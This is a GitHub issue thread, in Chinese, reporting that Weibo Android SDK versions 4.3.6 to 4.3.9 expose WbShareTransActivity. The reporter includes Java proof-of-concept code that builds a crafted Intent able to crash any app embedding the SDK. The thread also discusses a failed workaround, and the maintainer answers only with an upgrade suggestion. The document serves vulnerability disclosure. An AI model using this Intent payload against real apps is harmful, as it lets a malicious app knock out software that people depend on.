### ISSUE TITLE
【安全BUG】【渗透测试】【紧急】SDK暴露WbShareTransActivity，恶意应用构造相应Intent参数后触发可以导致APP崩溃

### ISSUE THREAD

**Issue by LittleWindSXF** [sinaweibosdk/weibo_android_sdk#470]
各位微博的开发者你们好，有个SDK的问题请帮忙看下，感谢：

问题描述：
使用4.3.6至4.3.9版本SDK集成至APP，由于SDK暴露WbShareTransActivity，恶意应用构造相应Intent参数后触发可以导致APP崩溃。

复现方法：
1. 打开集成了SDK的APP，并至少分享过一次微博，保证微博SDK已正确初始化
2. APP切换至后台，利用恶意程序向暴露的Activity：com.sina.weibo.sdk.share.WbShareTransActivity发送构造的Intent，如下
Bundle bundle = new Bundle();
bundle.putInt("_weibo_command_type", 1);
bundle.putInt("type", 0);
bundle.putString("_weibo_transaction", String.valueOf(System.currentTimeMillis()));
bundle.putLong("callbackId", 0);
Intent intent = new Intent();
intent.setClassName("com.xxx.xxx", "com.sina.weibo.sdk.share.WbShareTransActivity");
intent.putExtra("startFlag", 0);
intent.putExtra("startActivity", "com.huawei.intelligent.ui.share.ShareActivity");
intent.putExtra("gotoActivity", "com.sina.weibo.sdk.web.WeiboSdkWebActivity");
intent.putExtra("progressColor", -1);
intent.putExtra("progressId", -1);
intent.putExtras(bundle);
startActivityForResult(intent, 1);
重复步骤1~步骤4两次，系统会明确弹出APP“屡次停止运行”的通知

**Comment by LittleWindSXF** [comment]
如果直接粗暴地在APP的AndroidManifest.xml里覆盖定义WbShareTransActivity，并指明exported="false"，则会导致以下问题：
1. 应用在安卓4.4版本下分享微博，微博崩溃并重新打开，造成一个死循环
2. 应用在安卓9.0版本下分享微博，多次后微博崩溃，弹出微博“屡次停止运行”的通知

综上，建议SDK进行入参合法性检验，避免出现参数异常导致崩溃的问题，谢谢~

**Comment by sinaweibosdk** [comment]
请使用最新版本
